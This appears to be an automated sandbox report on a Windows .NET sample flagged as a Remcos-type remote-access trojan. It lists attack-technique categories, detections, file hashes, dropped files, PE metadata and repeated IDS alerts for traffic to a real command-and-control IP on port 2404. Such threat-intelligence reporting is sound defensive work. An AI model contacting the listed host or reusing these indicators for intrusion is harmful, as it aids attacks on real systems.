Collection: Archive Collected Data (11); Input Capture (111); Clipboard Data (3); Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging; Screen Capture
Command and Control: Ingress Tool Transfer (11); Encrypted Channel (2); Non-Standard Port (1); Remote Access Software (1); Application Layer Protocol (1); Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols; DNS
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol; Exfiltration Over Physical Medium
Impact: System Shutdown/Reboot (1); Defacement (1); Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption; Resource Hijacking

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

Source | Detection | Scanner | Label
Material requirements_1.pif.exe | 68% | ReversingLabs | Win32.Trojan.Znyonm
Material requirements_1.pif.exe | 64% | Virustotal |
Material requirements_1.pif.exe | 100% | Joe Sandbox ML |
No Antivirus matches
No contacted domains info

Name | Source | Malicious | Antivirus Detection | Reputation
http://geoplugin.net/json.gp | Material requirements_1.pif.exe | false | | high
http://geoplugin.net/json.gp/C | Material requirements_1.pif.exe, 00000000.00000002.2085360739.000000000474E000.00000004.00000800.00020000.00000000.sdmp, Material requirements_1.pif.exe, 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Material requirements_1.pif.exe, 00000000.00000002.2084001859.0000000002E39000.00000004.00000800.00020000.00000000.sdmp | false | | high

• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs

IP | Domain | Country | ASN | ASN Name | Malicious
87.120.116.245 | unknown | Bulgaria | 25206 | UNACS-AS-BG8000BurgasBG | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1586623
Start date and time: 2025-01-09 12:39:06 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 33s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Material requirements_1.pif.exe
Detection: MAL
Classification: mal100.rans.troj.spyw.expl.evad.winEXE@11/16@0/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 64
• Number of non-executed functions: 207
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 23.56.254.164, 13.107.246.45, 52.149.20.212
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

Time | Type | Description
06:40:01 | API Interceptor | 4541661x Sleep call for process: Material requirements_1.pif.exe modified
06:40:03 | API Interceptor | 9x Sleep call for process: powershell.exe modified
No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
UNACS-AS-BG8000BurgasBG | 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe | malicious | XWorm | 87.120.116.179
| 17363364631bc7418009f735fbf6670730f0df5be418dd7fb7bf7e79b36349f3b17d812142896.dat-decoded.exe | malicious | XWorm | 87.120.116.179
| Inquiry List.doc | malicious | DarkVision Rat | 87.120.113.91
| 3lhrJ4X.exe | malicious | LiteHTTP Bot | 87.120.126.5
| XClient.exe | malicious | XWorm | 87.120.125.47
| file.exe | malicious | DcRat, JasonRAT | 87.120.113.91
| 009274965.lnk | malicious | DarkVision Rat | 87.120.113.91
| hoEtvOOrYH.exe | malicious | SmokeLoader | 87.120.115.216
| rebirth.arm4t.elf | malicious | Gafgyt | 87.120.113.63
| rebirth.spc.elf | malicious | Gafgyt | 87.120.113.63
No context
Process: C:\Users\user\Desktop\Material requirements_1.pif.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5: 1330C80CAAC9A0FB172F202485E9B1E8
SHA1: 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256: B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512: 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious: true
Reputation: high, very likely benign file
                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 1172
Entropy (8bit): 5.354777075714867
Encrypted: false
SSDEEP: 24:3gWSKco4KmZjKbm51s4RPT6moUebIKo+mZ9t7J0gt/NKIl9r+q:QWSU4xymI4RfoUeW+mZ9tK8ND3
MD5: 0CBD5C86CC1353C7EF09E2ED3E0829E3
SHA1: 0FFE29A715ED1E32BB9491D3DD88FB72280ED040
SHA-256: B7A6D1B47CEA0A5084460775416103112E56A7A423216183ABAC974960FD51E7
SHA-512: C60EC6550188DCCD1EAD93CC49011BAC45134426ADEF81410468A1F613AD8F2E67AEF296F5C92092A62BFAC746FCA9DC8741FEC5600996F28A48BF2488E94D40
Malicious: false
Reputation: moderate, very likely benign file
                      Preview:@...e.................................,..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\System32\wbem\WMIADAP.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):3444
                      Entropy (8bit):5.011954215267298
                      Encrypted:false
                      SSDEEP:48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW
                      MD5:B133A676D139032A27DE3D9619E70091
                      SHA1:1248AA89938A13640252A79113930EDE2F26F1FA
                      SHA-256:AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
                      SHA-512:C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5
                      Malicious:false
                      Preview://////////////////////////////////////////////////////////////////////////////////////////////..//..// Copyright (C) 2000 Microsoft Corporation..//..// Module Name:..// WmiApRpl..//..// Abstract:..//..// Include file for object and counters definitions...//..//////////////////////////////////////////////////////////////////////////////////////////////......#define.WMI_Objects.0..#define.HiPerf_Classes.2..#define.HiPerf_Validity.4....#define.MSiSCSI_ConnectionStatistics_00000.6....#define.BytesReceived_00000.8..#define.BytesSent_00000.10..#define.PDUCommandsSent_00000.12..#define.PDUResponsesReceived_00000.14....#define.MSiSCSI_InitiatorInstanceStatistics_00001.16....#define.SessionConnectionTimeoutErrorCount_00001.18..#define.SessionDigestErrorCount_00001.20..#define.SessionFailureCount_00001.22..#define.SessionFormatErrorCount_00001.24....#define.MSiSCSI_InitiatorLoginStatistics_00002.26....#define.LoginAcceptRsps_00002.28..#define.LoginAuthenticateFails_00002.30..#define.LoginAuthFai
                      Process:C:\Windows\System32\wbem\WMIADAP.exe
                      File Type:Unicode text, UTF-16, little-endian text, with very long lines (405), with CRLF line terminators
                      Category:dropped
                      Size (bytes):48786
                      Entropy (8bit):3.5854495362228453
                      Encrypted:false
                      SSDEEP:384:esozoNc1+12zG1+b61ubSGMLVrj4+PtC81ZBg4Lg4ung4og4uo91K91zI91K91z2:esozozBg4Lg4ung4og4uWG4MG4o1
                      MD5:DF877BEC5C9E3382E94FEA48FEE049AC
                      SHA1:1D61436C8A1C057C1B1089EB794D90EE4B0D8FE9
                      SHA-256:7F0F3FA64E41A30BACA377B6399F8F7087BC54DA9FCA876BFDC2C2EEECA8454B
                      SHA-512:433CB16EBE2292CB60CB8CE71207EBB752295FB73E6D13E215E771EC5FC433EE29577AF28641255810C18078B95F04A9D37734B6F49CB6A6302821E365672205
                      Malicious:false
                      Preview:.././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././....././....././. .C.o.p.y.r.i.g.h.t. .(.C.). .2.0.0.0. .M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....././....././. .M.o.d.u.l.e. .N.a.m.e.:....././. .W.m.i.A.p.R.p.l....././....././. .A.b.s.t.r.a.c.t.:....././....././. .D.e.s.c.r.i.b.e.s. .a.l.l. .t.h.e. .c.o.u.n.t.e.r.s. .s.u.p.p.o.r.t.e.d. .v.i.a. .W.M.I. .H.i.-.P.e.r.f.o.r.m.a.n.c.e. .p.r.o.v.i.d.e.r.s....././....././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.............[.i.n.f.o.].....d.r.i.v.e.r.n.a.m.e.=.W.m.i.A.p.R.p.l.....s.y.m.b.o.l.f.i.l.e.=.W.m.i.A.p.R.p.l...h.........[.l.a.n.g.u.a.g.e.s.].....0.0.9.=.E.n.g.l.i.s.h.....0.0.9.=.E.n.g.l.i.s.h.........[.o.b.j.e.c.t.s.].....W.M.I._.O.b.j.e.c.t.s._.0.0.
                      Process:C:\Windows\System32\wbem\WMIADAP.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):840878
                      Entropy (8bit):3.4224066455051885
                      Encrypted:false
                      SSDEEP:3072:xJQGb/6IPolY/OhyIGmZkzTMWcnqgspmTbQiIJEDc3dv+eBrq2Bw+1wQ5xcEkc7+:01nqgsp2gOKih3
                      MD5:D3ED23A3E63ACA8CF656C585568DA6D7
                      SHA1:1A499D7E9A030D53B2A4DBD36F6F14B6531A6094
                      SHA-256:AE5A6E258A41298BE6CF2B3DA812E992E1D6A3C7FBC7DD4AA8B413DA850E8B65
                      SHA-512:21E2953B0819567865DA9C80A7D07021D7ED48F4BA3CD843C42D13D18E0E8FB27FA2F7C4EC86D4A1F4D887146F0F7E9E05B6A53D85398EA43240C2E180D52E00
                      Malicious:false
                      Preview:........[.P.e.r.f.l.i.b.].....B.a.s.e. .I.n.d.e.x.=.1.8.4.7.....L.a.s.t. .C.o.u.n.t.e.r.=.1.0.1.2.2.....L.a.s.t. .H.e.l.p.=.1.0.1.2.3.........[.P.E.R.F._...N.E.T. .C.L.R. .D.a.t.a.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.6.8.4.0.....F.i.r.s.t. .H.e.l.p.=.6.8.4.1.....L.a.s.t. .C.o.u.n.t.e.r.=.6.8.5.2.....L.a.s.t. .H.e.l.p.=.6.8.5.3.........[.P.E.R.F._...N.E.T. .C.L.R. .N.e.t.w.o.r.k.i.n.g.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.6.8.2.8.....F.i.r.s.t. .H.e.l.p.=.6.8.2.9.....L.a.s.t. .C.o.u.n.t.e.r.=.6.8.3.8.....L.a.s.t. .H.e.l.p.=.6.8.3.9.........[.P.E.R.F._...N.E.T. .C.L.R. .N.e.t.w.o.r.k.i.n.g. .4...0...0...0.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.6.9.0.0.....F.i.r.s.t. .H.e.l.p.=.6.9.0.1.....L.a.s.t. .C.o.u.n.t.e.r.=.6.9.2.6.....L.a.s.t. .H.e.l.p.=.6.9.2.7.........[.P.E.R.F._...N.E.T. .D.a.t.a. .P.r.o.v.i.d.e.r. .f.o.r. .O.r.a.c.l.e.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.8.9.1.6.....F.i.r.s.t. .H.e.l.p.=.8.9.1.7.....L.a.s.t. .C.o.u.n.t.e.r.=.8.9.4.4.....L.a.s.t. .H.e.l.p.=.8.9.4.5.........[.P.E.R.F._...N.E.
                      Process:C:\Windows\System32\wbem\WMIADAP.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):137550
                      Entropy (8bit):3.409189992022338
                      Encrypted:false
                      SSDEEP:1536:X1i4nfw8ld9+mRDaUR28oV7TYfXLi7NwrgSwNu56FRtg:XBnfw8ld9+mRDaUR28oV7TY+7S0ba
                      MD5:084B771A167854C5B38E25D4E199B637
                      SHA1:AE6D36D4EC5A9E515E8735525BD80C96AC0F8122
                      SHA-256:B3CF0050FAF325C36535D665C24411F3877E3667904DFE9D8A1C802ED4BCD56D
                      SHA-512:426C15923F54EC93F22D9523B5CB6D326F727A34F5FF2BDE63D1CB3AD97CAB7E5B2ABABBC6ED5082B5E3140E9342A4E6F354359357A3F9AEF285278CB38A5835
                      Malicious:false
                      Preview:1...1.8.4.7...2...S.y.s.t.e.m...4...M.e.m.o.r.y...6...%. .P.r.o.c.e.s.s.o.r. .T.i.m.e...1.0...F.i.l.e. .R.e.a.d. .O.p.e.r.a.t.i.o.n.s./.s.e.c...1.2...F.i.l.e. .W.r.i.t.e. .O.p.e.r.a.t.i.o.n.s./.s.e.c...1.4...F.i.l.e. .C.o.n.t.r.o.l. .O.p.e.r.a.t.i.o.n.s./.s.e.c...1.6...F.i.l.e. .R.e.a.d. .B.y.t.e.s./.s.e.c...1.8...F.i.l.e. .W.r.i.t.e. .B.y.t.e.s./.s.e.c...2.0...F.i.l.e. .C.o.n.t.r.o.l. .B.y.t.e.s./.s.e.c...2.4...A.v.a.i.l.a.b.l.e. .B.y.t.e.s...2.6...C.o.m.m.i.t.t.e.d. .B.y.t.e.s...2.8...P.a.g.e. .F.a.u.l.t.s./.s.e.c...3.0...C.o.m.m.i.t. .L.i.m.i.t...3.2...W.r.i.t.e. .C.o.p.i.e.s./.s.e.c...3.4...T.r.a.n.s.i.t.i.o.n. .F.a.u.l.t.s./.s.e.c...3.6...C.a.c.h.e. .F.a.u.l.t.s./.s.e.c...3.8...D.e.m.a.n.d. .Z.e.r.o. .F.a.u.l.t.s./.s.e.c...4.0...P.a.g.e.s./.s.e.c...4.2...P.a.g.e. .R.e.a.d.s./.s.e.c...4.4...P.r.o.c.e.s.s.o.r. .Q.u.e.u.e. .L.e.n.g.t.h...4.6...T.h.r.e.a.d. .S.t.a.t.e...4.8...P.a.g.e.s. .O.u.t.p.u.t./.s.e.c...5.0...P.a.g.e. .W.r.i.t.e.s./.s.e.c...5.2...B.r.o.w.s.e.r...5.4...A.n.n.o.u.
                      Process:C:\Windows\System32\wbem\WMIADAP.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):715050
                      Entropy (8bit):3.278818886805871
                      Encrypted:false
                      SSDEEP:3072:NUdGNuowE4j0PrRZnpETMDZ8M6d0PHHx643/A5BK9YXdhPHlVziwC4ALWI1dnmRh:78M6d0w+WB6I
                      MD5:342BC94F85E143BE85B5B997163A0BB3
                      SHA1:8780CD88D169AE88C843E19239D9A32625F6A73E
                      SHA-256:F7D40B4FADA44B2A5231780F99C3CE784BCF33866B59D5EB767EEA8E532AD2C4
                      SHA-512:0A4ED9104CAFCE95E204B5505181816E7AA7941DED2694FF75EFABAAB821BF0F0FE5B32261ED213C710250B7845255F4E317D86A3A6D4C2C21F866207233C57E
                      Malicious:false
                      Preview:3...T.h.e. .S.y.s.t.e.m. .p.e.r.f.o.r.m.a.n.c.e. .o.b.j.e.c.t. .c.o.n.s.i.s.t.s. .o.f. .c.o.u.n.t.e.r.s. .t.h.a.t. .a.p.p.l.y. .t.o. .m.o.r.e. .t.h.a.n. .o.n.e. .i.n.s.t.a.n.c.e. .o.f. .a. .c.o.m.p.o.n.e.n.t. .p.r.o.c.e.s.s.o.r.s. .o.n. .t.h.e. .c.o.m.p.u.t.e.r.....5...T.h.e. .M.e.m.o.r.y. .p.e.r.f.o.r.m.a.n.c.e. .o.b.j.e.c.t. . .c.o.n.s.i.s.t.s. .o.f. .c.o.u.n.t.e.r.s. .t.h.a.t. .d.e.s.c.r.i.b.e. .t.h.e. .b.e.h.a.v.i.o.r. .o.f. .p.h.y.s.i.c.a.l. .a.n.d. .v.i.r.t.u.a.l. .m.e.m.o.r.y. .o.n. .t.h.e. .c.o.m.p.u.t.e.r... . .P.h.y.s.i.c.a.l. .m.e.m.o.r.y. .i.s. .t.h.e. .a.m.o.u.n.t. .o.f. .r.a.n.d.o.m. .a.c.c.e.s.s. .m.e.m.o.r.y. .o.n. .t.h.e. .c.o.m.p.u.t.e.r... . .V.i.r.t.u.a.l. .m.e.m.o.r.y. .c.o.n.s.i.s.t.s. .o.f. .t.h.e. .s.p.a.c.e. .i.n. .p.h.y.s.i.c.a.l. .m.e.m.o.r.y. .a.n.d. .o.n. .d.i.s.k... . .M.a.n.y. .o.f. .t.h.e. .m.e.m.o.r.y. .c.o.u.n.t.e.r.s. .m.o.n.i.t.o.r. .p.a.g.i.n.g.,. .w.h.i.c.h. .i.s. .t.h.e. .m.o.v.e.m.e.n.t. .o.f. .p.a.g.e.s. .o.f. .c.o.d.e. .a.n.d. .d.a.t.a. .b.e.t.
                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Entropy (8bit):7.960291398712237
                      TrID:
                      • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                      • Win32 Executable (generic) a (10002005/4) 49.75%
                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                      • Windows Screen Saver (13104/52) 0.07%
                      • Generic Win/DOS Executable (2004/3) 0.01%
                      File name:Material requirements_1.pif.exe
                      File size:969'728 bytes
                      MD5:b10dbc0225aac52e8ee344602847a3cc
                      SHA1:4bedc08167e1f21c85593c730e29d10036e0b219
                      SHA256:7a12e9a93cb32e622b05613c160fbbfae2d379f5c255bfca02eb1b54fe1a78a8
                      SHA512:579827dda319cbf9edb3d9955f27e68952f4587d73166192a68ff8609032465d892c6f08e4b19454b24c27c4cce6ddb56fce2e7df3121458c4d1f7c78d5e6156
                      SSDEEP:24576:Pf5eTij5iglZLSD2fhawjyCcT4L3CbY5O+eB:X5CU5PlZLm2fhDcTBbY5O+eB
                      TLSH:B22523089788CFECCA590FBE14640F219770FB9044C3E7265A1A446B2DA7327D19A7BB
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...d.~g..............0.............r.... ........@.. ....................... ............@................................
                      Icon Hash:00928e8e8686b000
                      Entrypoint:0x4ede72
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Time Stamp:0x677E1864 [Wed Jan 8 06:17:08 2025 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:4
                      OS Version Minor:0
                      File Version Major:4
                      File Version Minor:0
                      Subsystem Version Major:4
                      Subsystem Version Minor:0
                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                      Instruction
                      jmp dword ptr [00402000h]
                      adc dh, byte ptr [esi+edx*2]
                      js 00007F6254B5C462h
                      add byte ptr [eax], al
                      add byte ptr [ecx], al
                      add byte ptr [eax], al
                      add byte ptr [edx], al
                      add byte ptr [eax], al
                      add byte ptr [ebx], al
                      add byte ptr [eax], al
                      add byte ptr [eax+eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0xede1f0x4f.text
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xee0000x618.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xf00000xc.reloc
                      IMAGE_DIRECTORY_ENTRY_DEBUG0xebb9c0x54.text
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      .text0x20000xebe900xec000809e7e1081698863d9050125e0c0154fFalse0.9578371209613348data7.965477253296922IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .rsrc0xee0000x6180x8005df6079168a109f629178aeb7d2eab67False0.3359375data3.4534780995024366IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .reloc0xf00000xc0x20015179598233edc28f61428422023fa21False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name         RVA      Size   Type                                                                              Language  Country  ZLIB Complexity
RT_VERSION   0xee090  0x388  data                                                                                                 0.4170353982300885
RT_MANIFEST  0xee428  0x1ea  XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators                    0.5489795918367347
DLL          Import
mscoree.dll  _CorExeMain
Timestamp                        SID      Signature                                    Severity  Source IP    Source Port  Dest IP         Dest Port  Protocol
2025-01-09T12:40:05.780254+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  49709        87.120.116.245  2404       TCP
2025-01-09T12:40:08.414907+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  49711        87.120.116.245  2404       TCP
2025-01-09T12:40:11.055869+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  49713        87.120.116.245  2404       TCP
2025-01-09T12:40:14.057305+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  49714        87.120.116.245  2404       TCP
2025-01-09T12:40:16.715765+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  49715        87.120.116.245  2404       TCP
2025-01-09T12:40:19.333540+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  49717        87.120.116.245  2404       TCP
2025-01-09T12:40:21.943828+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  49736        87.120.116.245  2404       TCP
2025-01-09T12:40:24.572495+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  49754        87.120.116.245  2404       TCP
2025-01-09T12:40:27.209878+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  49772        87.120.116.245  2404       TCP
2025-01-09T12:40:29.837074+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  49787        87.120.116.245  2404       TCP
2025-01-09T12:40:32.462267+0100  2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection  1         192.168.2.5  49806        87.120.116.245  2404       TCP
